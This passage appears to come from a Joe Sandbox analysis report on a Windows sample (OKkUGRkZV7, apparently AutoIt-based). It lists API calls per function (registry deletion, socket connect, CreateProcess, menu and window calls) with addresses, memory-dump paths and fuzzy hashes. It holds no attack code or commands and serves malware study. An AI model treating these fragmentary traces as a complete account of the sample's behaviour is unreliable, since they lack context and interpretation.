                                              • FreeLibrary.KERNEL32(00000000), ref: 003C10B5
                                                • Part of subcall function 003C0FA5: RegCloseKey.ADVAPI32(?), ref: 003C101B
                                                • Part of subcall function 003C0FA5: FreeLibrary.KERNEL32(?), ref: 003C106D
                                                • Part of subcall function 003C0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 003C1090
                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 003C1058
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                              • String ID:
                                              • API String ID: 395352322-0
                                              • Opcode ID: f346392252f6f8a3a3a769714a6a962040bdadc3a3cfbb0fa7947aa8613539f8
                                              • Instruction ID: b57682f76aab3b2169a8ce314267065265ca9a75342ad71a851385976df7f538
                                              • Opcode Fuzzy Hash: f346392252f6f8a3a3a769714a6a962040bdadc3a3cfbb0fa7947aa8613539f8
                                              • Instruction Fuzzy Hash: 62310C71901119BFDB16DB90DC89EFFB7BCEF09300F004169E512E2151EA75AE89ABA0
                                              APIs
                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 003C62EC
                                              • GetWindowLongW.USER32(01605808,000000F0), ref: 003C631F
                                              • GetWindowLongW.USER32(01605808,000000F0), ref: 003C6354
                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 003C6386
                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003C63B0
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 003C63C1
                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003C63DB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: LongWindow$MessageSend
                                              • String ID:
                                              • API String ID: 2178440468-0
                                              • Opcode ID: 71c3d853eefee305252e9dc9b61cec1b54e99826b4924a48f841180b27f85164
                                              • Instruction ID: 834a83bcbd4e6c28b0b769ca64b92cfec298d61bfe5730a54cd21a681af6ac6b
                                              • Opcode Fuzzy Hash: 71c3d853eefee305252e9dc9b61cec1b54e99826b4924a48f841180b27f85164
                                              • Instruction Fuzzy Hash: E6311139644290AFDB22DF18EC86F5937E5FB4A714F1A41A8F900DF2B2CB71AC509B50
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0039DB2E
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0039DB54
                                              • SysAllocString.OLEAUT32(00000000), ref: 0039DB57
                                              • SysAllocString.OLEAUT32(?), ref: 0039DB75
                                              • SysFreeString.OLEAUT32(?), ref: 0039DB7E
                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 0039DBA3
                                              • SysAllocString.OLEAUT32(?), ref: 0039DBB1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                              • String ID:
                                              • API String ID: 3761583154-0
                                              • Opcode ID: 2c3ee6685de6d8e375636c0d17f917ee4886307a11231fe632d204ec4b07a189
                                              • Instruction ID: de2cc6aebe650d9f1841b7d8cb1d1079a99d73e678d015a4a8add84fc02b9800
                                              • Opcode Fuzzy Hash: 2c3ee6685de6d8e375636c0d17f917ee4886307a11231fe632d204ec4b07a189
                                              • Instruction Fuzzy Hash: 7E21D332600219AFDF11EFB9DC89CBB73ADEB08360B028526F918DB260D674EC418760
                                              APIs
                                                • Part of subcall function 003B7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 003B7DB6
                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 003B61C6
                                              • WSAGetLastError.WSOCK32(00000000), ref: 003B61D5
                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 003B620E
                                              • connect.WSOCK32(00000000,?,00000010), ref: 003B6217
                                              • WSAGetLastError.WSOCK32 ref: 003B6221
                                              • closesocket.WSOCK32(00000000), ref: 003B624A
                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 003B6263
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                              • String ID:
                                              • API String ID: 910771015-0
                                              • Opcode ID: 0f63d15b122b2d7050993ac5ad595f68fb8c09077c5e37b64a4cd5c251e648e4
                                              • Instruction ID: 9f00c9eac411e8bde8e6e907046b8e49f33744f897be218b2c04860e6dca2801
                                              • Opcode Fuzzy Hash: 0f63d15b122b2d7050993ac5ad595f68fb8c09077c5e37b64a4cd5c251e648e4
                                              • Instruction Fuzzy Hash: 1E31A431600208AFEF12AF24CC86FBE77ADEF45754F054429FA05DB692CB74AC048B61
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: __wcsnicmp
                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                              • API String ID: 1038674560-2734436370
                                              • Opcode ID: 608c99f49de9510a74e715c9e96923447bf4fa57075705e528adb98a23f222a9
                                              • Instruction ID: 68450bdf58f6b946a74bd6241e21dd4626de650702a56184147160c3e3eff4d0
                                              • Opcode Fuzzy Hash: 608c99f49de9510a74e715c9e96923447bf4fa57075705e528adb98a23f222a9
                                              • Instruction Fuzzy Hash: 4F2149722046116EDB23AA34AC03EB773DCDF56390F15843AF845CB191EB61ED41C295
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0039DC09
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0039DC2F
                                              • SysAllocString.OLEAUT32(00000000), ref: 0039DC32
                                              • SysAllocString.OLEAUT32 ref: 0039DC53
                                              • SysFreeString.OLEAUT32 ref: 0039DC5C
                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 0039DC76
                                              • SysAllocString.OLEAUT32(?), ref: 0039DC84
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                              • String ID:
                                              • API String ID: 3761583154-0
                                              • Opcode ID: ad8acc61906b0e8cd9a5c6e8a0c5af536bdeb596aa80b92f301ed4e4317678e1
                                              • Instruction ID: d7dd417132eb4917b569416991c0f78fcbe29850b3526511e6362fc5c52d2c59
                                              • Opcode Fuzzy Hash: ad8acc61906b0e8cd9a5c6e8a0c5af536bdeb596aa80b92f301ed4e4317678e1
                                              • Instruction Fuzzy Hash: 12218335604204BF9F15EFA9DC89DAB77EDEB08360B118125F915CB260DAB0EC41CB64
                                              APIs
                                                • Part of subcall function 00341D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00341D73
                                                • Part of subcall function 00341D35: GetStockObject.GDI32(00000011), ref: 00341D87
                                                • Part of subcall function 00341D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00341D91
                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 003C7632
                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 003C763F
                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 003C764A
                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 003C7659
                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 003C7665
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: MessageSend$CreateObjectStockWindow
                                              • String ID: Msctls_Progress32
                                              • API String ID: 1025951953-3636473452
                                              • Opcode ID: 3ee37def9a711f11e0dca229b8fb449013bf33dcae3ebea90ffeecd716896092
                                              • Instruction ID: 194aca5528048c633491e0b1bd696eebc99a0efcf942370ddd1123b70135d53b
                                              • Opcode Fuzzy Hash: 3ee37def9a711f11e0dca229b8fb449013bf33dcae3ebea90ffeecd716896092
                                              • Instruction Fuzzy Hash: 0C1186B215011DBFEF159F64CC85EE77F5DEF08798F114115BA44A6050C672AC21DBA4
                                              APIs
                                              • __init_pointers.LIBCMT ref: 00369AE6
                                                • Part of subcall function 00363187: EncodePointer.KERNEL32(00000000), ref: 0036318A
                                                • Part of subcall function 00363187: __initp_misc_winsig.LIBCMT ref: 003631A5
                                                • Part of subcall function 00363187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00369EA0
                                                • Part of subcall function 00363187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00369EB4
                                                • Part of subcall function 00363187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00369EC7
                                                • Part of subcall function 00363187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00369EDA
                                                • Part of subcall function 00363187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00369EED
                                                • Part of subcall function 00363187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00369F00
                                                • Part of subcall function 00363187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00369F13
                                                • Part of subcall function 00363187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00369F26
                                                • Part of subcall function 00363187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00369F39
                                                • Part of subcall function 00363187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00369F4C
                                                • Part of subcall function 00363187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00369F5F
                                                • Part of subcall function 00363187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00369F72
                                                • Part of subcall function 00363187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00369F85
                                                • Part of subcall function 00363187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00369F98
                                                • Part of subcall function 00363187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00369FAB
                                                • Part of subcall function 00363187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00369FBE
                                              • __mtinitlocks.LIBCMT ref: 00369AEB
                                              • __mtterm.LIBCMT ref: 00369AF4
                                                • Part of subcall function 00369B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00369AF9,00367CD0,003FA0B8,00000014), ref: 00369C56
                                                • Part of subcall function 00369B5C: _free.LIBCMT ref: 00369C5D
                                                • Part of subcall function 00369B5C: DeleteCriticalSection.KERNEL32(02@,?,?,00369AF9,00367CD0,003FA0B8,00000014), ref: 00369C7F
                                              • __calloc_crt.LIBCMT ref: 00369B19
                                              • __initptd.LIBCMT ref: 00369B3B
                                              • GetCurrentThreadId.KERNEL32 ref: 00369B42
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                              • String ID:
                                              • API String ID: 3567560977-0
                                              • Opcode ID: b1c03f55a597296bb4a153a9caa6c20ea7389d55f19e7512783c3388f5bca958
                                              • Instruction ID: 151dd6f3b79746348cfb8b0a1e52b23807c6815a05d321c9b3726d15bdc18197
                                              • Opcode Fuzzy Hash: b1c03f55a597296bb4a153a9caa6c20ea7389d55f19e7512783c3388f5bca958
                                              • Instruction Fuzzy Hash: F0F0623250971159EA277B74BC0375A269DDF02734F21C62BF450CA0DAEF7094414160
                                              APIs
                                              • _memset.LIBCMT ref: 003CB644
                                              • _memset.LIBCMT ref: 003CB653
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00406F20,00406F64), ref: 003CB682
                                              • CloseHandle.KERNEL32 ref: 003CB694
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: _memset$CloseCreateHandleProcess
                                              • String ID: o@$do@
                                              • API String ID: 3277943733-129461833
                                              • Opcode ID: fde221d828e6c92d3a7aca4eb7efbe09f05a6c650b1cea1cc2ff2dd27acc3380
                                              • Instruction ID: 58a3d92cd6c2a13b1f5d2fc31f7b4d4533f24bee871a2eb62a7280cd69608c1f
                                              • Opcode Fuzzy Hash: fde221d828e6c92d3a7aca4eb7efbe09f05a6c650b1cea1cc2ff2dd27acc3380
                                              • Instruction Fuzzy Hash: C7F0FEB25403067EE2117765BC06FBB7A9DEB09795F028031BA0AF9196DB765C2087AC
                                              APIs
                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00363F85), ref: 00364085
                                              • GetProcAddress.KERNEL32(00000000), ref: 0036408C
                                              • EncodePointer.KERNEL32(00000000), ref: 00364097
                                              • DecodePointer.KERNEL32(00363F85), ref: 003640B2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                              • String ID: RoUninitialize$combase.dll
                                              • API String ID: 3489934621-2819208100
                                              • Opcode ID: 4775ddb550a28a425729351f3a9145c9eda64578ba87a1e632f40e390fa2a173
                                              • Instruction ID: 24402bb8bfb72211142273a4164d60ed17a2848369e37926acaebacdcafcc74e
                                              • Opcode Fuzzy Hash: 4775ddb550a28a425729351f3a9145c9eda64578ba87a1e632f40e390fa2a173
                                              • Instruction Fuzzy Hash: A0E09274981200AFEB12AF61EE09B467AAEB718743F154435F111E91A0CFB656048B18
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: _memmove$__itow__swprintf
                                              • String ID:
                                              • API String ID: 3253778849-0
                                              • Opcode ID: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
                                              • Instruction ID: 8ff70186d5936da298381f278c7f5b673d80cd7ead626fe7162adae50148c43e
                                              • Opcode Fuzzy Hash: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
                                              • Instruction Fuzzy Hash: F061793090065A9BCF17EF64CC82ABF37A9EF4A308F094919F8595F1A2DB35E915CB50
                                              APIs
                                                • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                                • Part of subcall function 003C0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003BFDAD,?,?), ref: 003C0E31
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003C02BD
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003C02FD
                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 003C0320
                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 003C0349
                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 003C038C
                                              • RegCloseKey.ADVAPI32(00000000), ref: 003C0399
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                              • String ID:
                                              • API String ID: 4046560759-0
                                              • Opcode ID: 253528392d0ef4209490b9193ba461bf51a25ddac8a2be45f2afa6792f9e1e88
                                              • Instruction ID: 4c3a56406c8ffe4e0ce27c650e117ecd3d10fe43908f8773367e59fa040e47c7
                                              • Opcode Fuzzy Hash: 253528392d0ef4209490b9193ba461bf51a25ddac8a2be45f2afa6792f9e1e88
                                              • Instruction Fuzzy Hash: A6513731208240AFC716EF64C885E6FBBE9FF89714F04491DF5958B2A2DB31E905CB52
                                              APIs
                                              • GetMenu.USER32(?), ref: 003C57FB
                                              • GetMenuItemCount.USER32(00000000), ref: 003C5832
                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 003C585A
                                              • GetMenuItemID.USER32(?,?), ref: 003C58C9
                                              • GetSubMenu.USER32(?,?), ref: 003C58D7
                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 003C5928
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Menu$Item$CountMessagePostString
                                              • String ID:
                                              • API String ID: 650687236-0
                                              • Opcode ID: 9ad1ff3bd25067f0c990030bfd1ab78df9597078a9f1546b98098ca4a8fe1f76
                                              • Instruction ID: 162d588baeb01828b7600537bc19a63ebe098b80ec58203b7a4d34aae1376ee8
                                              • Opcode Fuzzy Hash: 9ad1ff3bd25067f0c990030bfd1ab78df9597078a9f1546b98098ca4a8fe1f76
                                              • Instruction Fuzzy Hash: 58515B31E00A15AFCF16EF64C845EAEB7B5EF48320F114069E806EB351CB75BE818B90
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 0039EF06
                                              • VariantClear.OLEAUT32(00000013), ref: 0039EF78
                                              • VariantClear.OLEAUT32(00000000), ref: 0039EFD3
                                              • _memmove.LIBCMT ref: 0039EFFD
                                              • VariantClear.OLEAUT32(?), ref: 0039F04A
                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0039F078
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Variant$Clear$ChangeInitType_memmove
                                              • String ID:
                                              • API String ID: 1101466143-0
                                              • Opcode ID: 5756f13310bccf14ddb384477d76ef14b0ac6f08f4553369dec0bbf9a5a166bc
                                              • Instruction ID: 7a35f5d995c0ac27335a7a58ed45bc80bc81253bbedcc89bbeeded9ccebec2da
                                              • Opcode Fuzzy Hash: 5756f13310bccf14ddb384477d76ef14b0ac6f08f4553369dec0bbf9a5a166bc
                                              • Instruction Fuzzy Hash: 465168B5A00209EFCB15DF58C880AAAB7B9FF4C314F15856AE959DB301E735E911CBA0
                                              APIs
                                              • _memset.LIBCMT ref: 003A2258
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003A22A3
                                              • IsMenu.USER32(00000000), ref: 003A22C3
                                              • CreatePopupMenu.USER32 ref: 003A22F7
                                              • GetMenuItemCount.USER32(000000FF), ref: 003A2355
                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 003A2386
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                              • String ID:
                                              • API String ID: 3311875123-0
                                              • Opcode ID: 45cb421193cdce6d9c1f55aa1add518e93c70bd4e16d2736529b73e1cfc21bd9
